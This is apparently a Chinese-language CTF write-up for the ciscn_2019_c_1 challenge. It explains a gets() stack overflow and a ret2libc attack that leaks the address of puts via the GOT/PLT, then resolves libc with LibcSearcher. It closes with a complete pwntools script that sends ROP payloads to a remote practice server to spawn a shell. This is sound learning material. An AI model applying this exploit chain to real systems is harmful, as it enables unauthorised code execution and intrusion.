ciscn_2019_c_1

第一次写到ret2libc，记个笔记加深印象。

F5反汇编main函数后，会让我们选择函数。我们注意到

encrypt函数中存在着gets(s) 栈溢出漏洞。

但是并没有存在system函数，所以我们不能直接利用。

所以我们要用ret2libc技术，先考虑泄露libc基地址。

在mian和encrypt函数中都出现了puts函数

我们知道根据延迟绑定技术：

plt表中的函数如果没有被调用过，那么got表中该函数的对应项则指向plt表的第二行指令。当完成了第一次调用后，got表中会存放函数的真实地址，plt表这时候只起到调用的作用。

所以，puts函数既被函数调用了，又可以输出一些东西，可以成为我们ret2libc技术的好帮手。

所以我们第一个payload1应该是

payload1=b"a"*88+p64(pop_rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

第一次写，我可能写的比较啰嗦

记一下笔记：

‘a'*88前加b的原因是 py3中 char类型想要用+拼接要加上b强制转换。

pop_rdi_addr  是因为在x64中，函数调用优先使用寄存器。超过6个参数后才使用栈传参。

puts_got是把puts函数的真实地址传递给rdi

puts_plt用于作为返回地址调用函数

最后我们再次进入整个程序。

接下来我们提交过后需要接收puts函数的真实位置，再根据libc不同版本下puts函数的偏移，来计算出libc基地址。

puts=u64(ru('\n')[:-1].ljust(8,b'\0'))

[:-1]代表的是取该行字符串除去最后一个字符外的字符串。（可能是因为最后一个字符是个换行符）

ljust(8,b'\0')的意思是 接收8个字符，再加上\0 成为一个字符串

接下来暴露了libc地址，就是简单的rop了

from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
sla=lambda x,y:io.sendlineafter(x,y)
io=remote('node3.buuoj.cn',******)
elf=ELF('./ciscn_2019_c_1')
ret=0x4006b9
pop_rdi=0x400c83
main=elf.sym['main']
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
sla('choice!\n','1')
payload=b'\0'+b'a'*(0x50-1+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
sla('encrypted\n',payload)
rl()
rl()
puts=u64(ru('\n')[:-1].ljust(8,b'\0'))
libc=LibcSearcher('puts',puts)
libc_addr=puts-libc.dump('puts')
binsh=libc_addr+libc.dump('str_bin_sh')
system=libc_addr+libc.dump('system')
sla('choice!\n','1')
payload=b'\0'+b'a'*(0x50-1+8)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
sla('encrypted\n',payload)
io.interactive()

借鉴他人的wp